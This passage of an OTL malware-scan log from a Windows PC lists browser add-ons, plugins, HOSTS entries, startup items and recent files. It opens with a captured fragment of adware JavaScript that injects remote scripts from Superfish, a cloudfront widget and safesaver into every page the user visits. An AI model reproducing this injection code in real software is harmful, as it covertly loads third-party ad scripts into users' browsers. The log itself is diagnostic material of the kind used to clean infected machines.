4791F&\")>-1||url.indexOf(\"duit&ptag=A79888693F6CA4634A6F\")>-1||url.indexOf(\"duit&ptag=A359B17B6FAA44E6B86F\")>-1||url.indexOf(\"ISID=MF245F633-E188-4162-B56A\")>-1||url.indexOf(\"SID=MEABFCF9A-556B-4C5C-8727\")>-1||url.indexOf(\"ISID=M8FBC22FE-AB08-464E-AA63\")>-1||url.indexOf(\"uid=531364863_132823_4252277E\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"search?hspart=webpick&hsimp=yhs-1&p=\")>-1||url.match(/search.yahoo.com.+hspart=.+/)||url.match(/websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporte
r|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|greatresults|youwillfind|lookforitthere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|searchisfun|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches).info/)||url.match(/search.(easylifeapp|gboxapp|searchonme|appsarefun|genieo).com/)||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1){return}}catch(e){};if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//www.superfish.com/ws/sf_main.jsp?dlsource=vdx&userId=2528916844&CTID=p320';document.getElementsByTagName(\"head\")[0].appendChild(script);};(function(){if(-1<window.self.location.protocol.indexOf(\"http\")&&window.self==window.top){var a,b=document.getElementsByTagName(\"head\")[0];a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//d1sywn6q49ki6d.cloudfront.net/build/production/wp/widget.min.js?r=684295654\";b.appendChild(a);a=document.createElement(\"link\");a.type=\"text/css\";a.rel=\"stylesheet\";a.href=\"//d1sywn6q49ki6d.cloudfront.net/build/production/wp/style.css?r=684295654\";b.appendChild(a)}})();;if(window.self==window.top && window.self.location.protocol=='http:'){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//static.safesaver.net/apps/tv-classic/safesaver/tv-classic-safesaver.js\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.self==window.top && window.self.location.protocol=='http:'){var 
FF - prefs.js..extensions.enabledAddons: {23fcfd51-4958-4f00-80a3-ae97e717ed8b}:2.1.2.172
FF - prefs.js..extensions.enabledItems: {BBDA0591-3099-440a-AA10-41764D9DB4DB}:2.0
FF - prefs.js..extensions.enabledItems: {2D3F3651-74B9-4795-BDEC-6DA2F431CB62}:4.6
FF - prefs.js..extensions.enabledItems: {23fcfd51-4958-4f00-80a3-ae97e717ed8b}:2.1.0.900
FF - prefs.js..extensions.enabledItems: {6904342A-8307-11DF-A508-4AE2DFD72085}:2.1.0.900
FF - user.js - File not found
 
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF32_13_0_0_214.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\Windows\system32\Adobe\Director\np32dsw_1200112.dll (Adobe Systems, Inc.)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Browser Plugin,version=1.0.0: C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Player Plugin,version=1.0.0: C:\Program Files\DivX\DivX Player\npDivxPlayerPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.55.2: C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.55.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6: C:\Program Files\Yahoo!\Shared\npYState.dll (Yahoo! Inc.)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/VirtualEarth3D,version=2.0: C:\Program Files\Virtual Earth 3D\ [2007/12/14 12:10:25 | 000,000,000 | ---D | M]
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVision: C:\Program Files\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVisionStreaming: C:\Program Files\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF - HKLM\Software\MozillaPlugins\@pack.google.com/Google Updater;version=14: C:\Program Files\Google\Google Updater\2.4.2432.1652\npCIDetect14.dll (Google)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{203FB6B2-2E1E-4474-863B-4C483ECCE78E}: C:\ProgramData\Norton\{92622AAD-05E8-4459-B256-765CE1E929FB}\NST_1.2.0.6\coFFNST\ [2011/08/02 11:25:28 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{23fcfd51-4958-4f00-80a3-ae97e717ed8b}: C:\Program Files\DivX\DivX Plus Web Player\firefox\DivXHTML5 [2013/03/04 17:15:27 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 4.0\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013/02/02 21:11:39 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 4.0\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2013/01/14 23:59:14 | 000,000,000 | ---D | M]
 
[2010/11/26 00:13:47 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Ken\AppData\Roaming\Mozilla\Extensions
[2010/11/26 00:13:47 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Ken\AppData\Roaming\Mozilla\Extensions\{3550f703-e582-4d05-9a08-453d09bdfdc6}
[2014/05/19 22:34:20 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Ken\AppData\Roaming\Mozilla\Firefox\Profiles\8agrx3pn.default\extensions
[2010/08/07 16:01:40 | 000,000,000 | ---D | M] (Microsoft .NET Framework Assistant) -- C:\Users\Ken\AppData\Roaming\Mozilla\Firefox\Profiles\8agrx3pn.default\extensions\{20a82645-c095-46ed-80e3-08825760534b}
[2012/02/23 22:12:56 | 000,000,000 | ---D | M] (Google Toolbar for Firefox) -- C:\Users\Ken\AppData\Roaming\Mozilla\Firefox\Profiles\8agrx3pn.default\extensions\{3112ca9c-de6d-4884-a869-9855de68056c}
[2012/06/19 10:53:37 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\extensions
[2007/12/15 02:49:00 | 000,000,000 | ---D | M] (Google Toolbar for Firefox) -- C:\Program Files\Mozilla Firefox\extensions\{3112ca9c-de6d-4884-a869-9855de68056c}
[2013/03/04 17:15:27 | 000,000,000 | ---D | M] (No name found) -- C:\PROGRAM FILES\DIVX\DIVX PLUS WEB PLAYER\FIREFOX\DIVXHTML5
[2011/03/18 13:53:24 | 000,142,296 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll
[2012/06/28 11:42:00 | 000,012,800 | ---- | M] (Nullsoft, Inc.) -- C:\Program Files\mozilla firefox\plugins\npwachk.dll
[2010/01/01 04:00:00 | 000,002,252 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\bing.xml
 
========== Chrome  ==========
 
CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},
CHR - homepage: http://www.google.com
CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files\Google\Chrome\Application\21.0.1180.83\PepperFlash\pepflashplayer.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files\Google\Chrome\Application\34.0.1847.137\gcswf32.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\Windows\system32\Macromed\Flash\NPSWF32_11_2_202_235.dll
CHR - plugin: Remoting Viewer (Enabled) = internal-remoting-viewer
CHR - plugin: Native Client (Enabled) = C:\Program Files\Google\Chrome\Application\34.0.1847.137\ppGoogleNaClPluginChrome.dll
CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Program Files\Google\Chrome\Application\34.0.1847.137\pdf.dll
CHR - plugin: Adobe Acrobat (Enabled) = C:\Program Files\Adobe\Reader 8.0\Reader\Browser\nppdf32.dll
CHR - plugin: Microsoft® Windows Media Player Firefox Plugin (Enabled) = C:\Program Files\Mozilla Firefox\plugins\np-mswmp.dll
CHR - plugin: DivX Player Netscape Plugin (Enabled) = C:\Program Files\Mozilla Firefox\plugins\npDivxPlayerPlugin.dll
CHR - plugin: QuickTime Plug-in 7.1.3 (Enabled) = C:\Program Files\Mozilla Firefox\plugins\npqtplugin.dll
CHR - plugin: QuickTime Plug-in 7.1.3 (Enabled) = C:\Program Files\Mozilla Firefox\plugins\npqtplugin2.dll
CHR - plugin: QuickTime Plug-in 7.1.3 (Enabled) = C:\Program Files\Mozilla Firefox\plugins\npqtplugin3.dll
CHR - plugin: QuickTime Plug-in 7.1.3 (Enabled) = C:\Program Files\Mozilla Firefox\plugins\npqtplugin4.dll
CHR - plugin: QuickTime Plug-in 7.1.3 (Enabled) = C:\Program Files\Mozilla Firefox\plugins\npqtplugin5.dll
CHR - plugin: QuickTime Plug-in 7.1.3 (Enabled) = C:\Program Files\Mozilla Firefox\plugins\npqtplugin6.dll
CHR - plugin: QuickTime Plug-in 7.1.3 (Enabled) = C:\Program Files\Mozilla Firefox\plugins\npqtplugin7.dll
CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL
CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL
CHR - plugin: DivX VOD Helper Plug-in (Enabled) = C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll
CHR - plugin: DivX Plus Web Player (Enabled) = C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll
CHR - plugin: Google Updater (Enabled) = C:\Program Files\Google\Google Updater\2.4.2432.1652\npCIDetect14.dll
CHR - plugin: Google Update (Enabled) = C:\Program Files\Google\Update\1.3.21.115\npGoogleUpdate3.dll
CHR - plugin: Java™ Platform SE 7 U5 (Enabled) = C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\plugin2\npjp2.dll
CHR - plugin: Java Deployment Toolkit 7.0.50.255 (Enabled) = C:\Windows\system32\npDeployJava1.dll
CHR - plugin: Silverlight Plug-In (Enabled) = c:\Program Files\Microsoft Silverlight\4.1.10329.0\npctrl.dll
CHR - plugin: Windows Presentation Foundation (Enabled) = c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll
CHR - Extension: Vaudix = C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Extensions\knfhfghnfdabbalddnnbdjmjomfgjbog\1\
CHR - Extension: Google Wallet = C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: DivX Plus Web Player HTML5 \u003Cvideo> = C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Extensions\nneajnkjbffgblleaoojgaacokifdkhm\2.1.2.172_0\
 
O1 HOSTS File: ([2014/05/19 20:35:59 | 000,431,917 | ---- | M]) - C:\Windows\System32\drivers\etc\HOSTS
O1 - Hosts: 127.0.0.1  localhost
O1 - Hosts: ::1  localhost    #[IPv6]
O1 - Hosts: 0.0.0.0  fr.a2dfp.net
O1 - Hosts: 0.0.0.0  m.fr.a2dfp.net
O1 - Hosts: 0.0.0.0  mfr.a2dfp.net
O1 - Hosts: 0.0.0.0  ad.a8.net
O1 - Hosts: 0.0.0.0  asy.a8ww.net
O1 - Hosts: 0.0.0.0  static.a-ads.com
O1 - Hosts: 0.0.0.0  abcstats.com
O1 - Hosts: 0.0.0.0  ad4.abradio.cz
O1 - Hosts: 0.0.0.0  a.abv.bg
O1 - Hosts: 0.0.0.0  adserver.abv.bg
O1 - Hosts: 0.0.0.0  adv.abv.bg
O1 - Hosts: 0.0.0.0  bimg.abv.bg
O1 - Hosts: 0.0.0.0  ca.abv.bg
O1 - Hosts: 0.0.0.0  www2.a-counter.kiev.ua
O1 - Hosts: 0.0.0.0  track.acclaimnetwork.com
O1 - Hosts: 0.0.0.0  accuserveadsystem.com
O1 - Hosts: 0.0.0.0  www.accuserveadsystem.com
O1 - Hosts: 0.0.0.0  achmedia.com
O1 - Hosts: 0.0.0.0  csh.actiondesk.com
O1 - Hosts: 0.0.0.0  ads.activepower.net
O1 - Hosts: 0.0.0.0  app.activetrail.com
O1 - Hosts: 0.0.0.0  stat.active24stats.nl    #[Tracking.Cookie]
O1 - Hosts: 0.0.0.0  traffic.acwebconnecting.com
O1 - Hosts: 13627 more lines...
O2 - BHO: (Adobe PDF Reader Link Helper) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll (Adobe Systems Incorporated)
O2 - BHO: (DivX Plus Web Player HTML5 <video>) - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll (DivX, LLC)
O2 - BHO: (Spybot-S&D IE Protection) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
O2 - BHO: (Groove GFS Browser Helper) - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (no name) - {83A2F9B1-01A2-4AA5-87D1-45B6B8505E96} - No CLSID value found.
O2 - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O2 - BHO: (Norton Safe Web Lite BHO) - {F0DA78E9-6B60-42fb-BC26-EF2CFB8C8FF3} - C:\Program Files\Norton Safe Web Lite\Engine\1.2.0.6\CoIEPlg.dll (Symantec Corporation)
O3 - HKLM\..\Toolbar: (Norton Safe Web Lite) - {30CEEEA2-3742-40e4-85DD-812BF1CBB83D} - C:\Program Files\Norton Safe Web Lite\Engine\1.2.0.6\CoIEPlg.dll (Symantec Corporation)
O3 - HKCU\..\Toolbar\ShellBrowser: (no name) - {5CBE3B7C-1E47-477E-A7DD-396DB0476E29} - No CLSID value found.
O3 - HKCU\..\Toolbar\WebBrowser: (Norton Safe Web Lite) - {30CEEEA2-3742-40E4-85DD-812BF1CBB83D} - C:\Program Files\Norton Safe Web Lite\Engine\1.2.0.6\CoIEPlg.dll (Symantec Corporation)
O4 - HKLM..\Run: [APSDaemon] C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [BCSSync] C:\Program Files\Microsoft Office\Office14\BCSSync.exe (Microsoft Corporation)
O4 - HKLM..\Run: [CTHelper] C:\Windows\System32\CtHelper.exe (Creative Technology Ltd)
O4 - HKLM..\Run: [DivXMediaServer] C:\Program Files\DivX\DivX Media Server\DivXMediaServer.exe (DivX, LLC)
O4 - HKLM..\Run: [DivXUpdate] C:\Program Files\DivX\DivX Update\DivXUpdate.exe ()
O4 - HKLM..\Run: [MSC] c:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4 - HKLM..\Run: [RtHDVCpl] C:\Windows\RtHDVCpl.exe (Realtek Semiconductor)
O4 - HKLM..\Run: [Symantec PIF AlertEng] C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc.exe (Symantec Corporation)
O4 - HKCU..\Run: [HostsMan] C:\Program Files\HostsMan\hm.exe (abelhadigital.com)
O4 - HKCU..\Run: [OpenDNS Updater] C:\Program Files\OpenDNS Updater\OpenDNSUpdater.exe ()
O4 - HKCU..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe (Safer-Networking Ltd.)
O4 - HKCU..\Run: [SUPERAntiSpyware] C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE (SUPERAntiSpyware)
O4 - Startup: C:\Users\Ken\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk = C:\Users\Ken\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
O8 - Extra context menu item: E&xport to Microsoft Excel - C:\Program Files\Microsoft Office\Office14\EXCEL.EXE (Microsoft Corporation)
O8 - Extra context menu item: Se&nd to OneNote - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra Button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : Se&nd to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra Button: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
O13 - gopher Prefix: missing
O16 - DPF: {05317530-B882-449D-9421-18D94FA3ED34} http://www.sis.com/ocis/OSInfo.cab (OSInfo Control)
O16 - DPF: {16095503-786F-4097-AED6-5D567A26D760} http://www.sis.com/o...utodetectNT.cab (SiS_OCX Control)
O16 - DPF: {44990B00-3C9D-426D-81DF-AAB636FA4345} https://www-secure.s...abs/tgctlcm.cab (Reg Error: Key error.)
O16 - DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} http://fpdownload.ma...r/ultrashim.cab (Reg Error: Key error.)
O16 - DPF: {CF40ACC5-E1BB-4AFF-AC72-04C2F616BCA7} http://www.adobe.com...obat/nos/gp.cab (get_atlcom Class)
O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} http://ccfiles.creat...13/CTPIDPDE.cab (Creative Software AutoUpdate Support Package 2)
O16 - DPF: {E705A591-DA3C-4228-B0D5-A356DBA42FBF} http://ccfiles.creat...015/CTSUEng.cab (Creative Software AutoUpdate 2)
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} http://ccfiles.creat...21022/CTPID.cab (Creative Software AutoUpdate Support Package)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.10.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{78665C2D-46DF-4788-BFC2-B06EFD46D2C3}: NameServer = 208.67.222.222,208.67.220.220
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{9AF3476A-ABC9-4638-B175-8F534F2EE741}: DhcpNameServer = 192.168.9.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{B0239C4C-5501-4BF0-9987-C91B97BE81B2}: DhcpNameServer = 192.168.10.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{BBBE3A5C-8D11-413B-B0EC-06F6820506B2}: DhcpNameServer = 208.67.222.222
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{C58FCDCC-8EF4-4894-889D-9FA33975FDF8}: DhcpNameServer = 209.251.153.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{C58FCDCC-8EF4-4894-889D-9FA33975FDF8}: NameServer = 208.67.222.222,208.67.220.220
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{F98C21FD-E6F5-4F6A-9252-FBF3C3E6338A}: DhcpNameServer = 209.251.153.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{F98C21FD-E6F5-4F6A-9252-FBF3C3E6338A}: NameServer = 208.67.222.222,208.67.220.220
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation)
O20 - Winlogon\Notify\!SASWinLogon: DllName - (C:\Program Files\SUPERAntiSpyware\SASWINLO.DLL) - C:\Program Files\SUPERAntiSpyware\SASWINLO.DLL (SUPERAntiSpyware.com)
O24 - Desktop WallPaper: D:\My Documents\bettiedesk.bmp
O24 - Desktop BackupWallPaper: D:\My Documents\bettiedesk.bmp
O28 - HKLM ShellExecuteHooks: {5AE067D3-9AFB-48E0-853A-EBB7F4A000DA} - C:\Program Files\SUPERAntiSpyware\SASSEH.DLL (SuperAdBlocker.com)
O28 - HKLM ShellExecuteHooks: {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2006/09/18 17:43:36 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]
O32 - AutoRun File - [2000/12/18 09:44:14 | 000,000,081 | ---- | M] () - F:\AUTOEXEC.BAT -- [ NTFS ]
O33 - MountPoints2\{0364bdc2-a25d-11df-a13c-001c2528d4ad}\Shell - "" = AutoRun
O33 - MountPoints2\{0364bdc2-a25d-11df-a13c-001c2528d4ad}\Shell\AutoRun\command - "" = M:\LaunchU3.exe -a
O33 - MountPoints2\{be0ba5ee-65d0-11e0-a473-00080e7997e3}\Shell - "" = AutoRun
O33 - MountPoints2\{be0ba5ee-65d0-11e0-a473-00080e7997e3}\Shell\AutoRun\command - "" = J:\CTRun\Start.EXE
O33 - MountPoints2\{fa47b680-5eb2-11e0-9cf4-001c2528d4ad}\Shell - "" = AutoRun
O33 - MountPoints2\{fa47b680-5eb2-11e0-9cf4-001c2528d4ad}\Shell\AutoRun\command - "" = K:\LaunchU3.exe -a
O34 - HKLM BootExecute: (autocheck autochk *)
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/05/20 08:34:41 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Ken\Desktop\OTL.exe
[2014/05/19 22:07:25 | 000,000,000 | ---D | C] -- C:\Users\Ken\AppData\Roaming\Oracle
[2014/05/19 22:07:05 | 000,000,000 | ---D | C] -- C:\Windows\Sun
[2014/05/19 22:06:26 | 000,000,000 | ---D | C] -- C:\ProgramData\Oracle
[2014/05/19 22:05:24 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
[2014/05/19 20:16:10 | 000,000,000 | ---D | C] -- C:\Users\Ken\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
[2014/05/19 12:37:29 | 000,000,000 | ---D | C] -- C:\aa8e0b99a77696e8ab0e55
[2014/05/19 12:09:02 | 000,000,000 | ---D | C] -- C:\Windows\Migration
[2014/05/19 12:02:31 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\DESIGNER
[2014/05/19 11:52:08 | 000,000,000 | ---D | C] -- C:\Windows\System32\MRT
[2014/05/19 10:45:52 | 000,000,000 | ---D | C] -- C:\Users\Ken\AppData\Roaming\DropboxMaster
[2014/05/19 10:36:53 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TRENDnet
[2014/05/19 10:36:52 | 000,430,080 | ---- | C] (Realtek) -- C:\Windows\SwUSB.exe
[2014/05/19 10:36:52 | 000,025,896 | ---- | C] (Windows ® Codename Longhorn DDK provider) -- C:\Windows\System32\drivers\RtlProt.sys
[2014/05/19 10:36:49 | 000,000,000 | ---D | C] -- C:\Program Files\TRENDnet
[3 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]
[3 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2014/05/20 10:01:00 | 000,642,740 | ---- | M] () -- C:\Windows\System32\perfh009.dat
[2014/05/20 10:01:00 | 000,119,932 | ---- | M] () -- C:\Windows\System32\perfc009.dat
[2014/05/20 09:57:00 | 000,000,886 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/05/20 09:54:32 | 000,000,882 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/05/20 09:53:43 | 000,003,168 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
[2014/05/20 09:53:43 | 000,003,168 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
[2014/05/20 09:53:27 | 000,067,584 | ---- | M] () -- C:\Windows\bootstat.dat
[2014/05/20 09:53:23 | 3220,758,528 | -HS- | M] () -- C:\hiberfil.sys
[2014/05/20 09:51:47 | 000,031,568 | ---- | M] () -- C:\Windows\System32\BMXStateBkp-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/20 09:51:47 | 000,031,568 | ---- | M] () -- C:\Windows\System32\BMXState-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/20 09:51:47 | 000,029,820 | ---- | M] () -- C:\Windows\System32\BMXCtrlState-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/20 09:51:47 | 000,029,820 | ---- | M] () -- C:\Windows\System32\BMXBkpCtrlState-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/20 09:51:47 | 000,011,564 | ---- | M] () -- C:\Windows\System32\DVCState-{00000000-00000000-0000000D-00001102-00000004-00511102}.rfx
[2014/05/20 08:28:38 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Ken\Desktop\OTL.exe
[2014/05/19 22:56:51 | 000,000,266 | ---- | M] () -- C:\Windows\tasks\AutoKMS.job
[2014/05/19 21:18:40 | 000,000,275 | ---- | M] () -- C:\Windows\wininit.ini
[2014/05/19 20:35:59 | 000,431,917 | ---- | M] () -- C:\Windows\System32\drivers\etc\HOSTS
[2014/05/19 20:20:10 | 000,945,568 | ---- | M] () -- C:\Windows\System32\drivers\etc\HOSTS.bak
[2014/05/19 20:16:10 | 000,001,061 | ---- | M] () -- C:\Users\Ken\Desktop\Revo Uninstaller.lnk
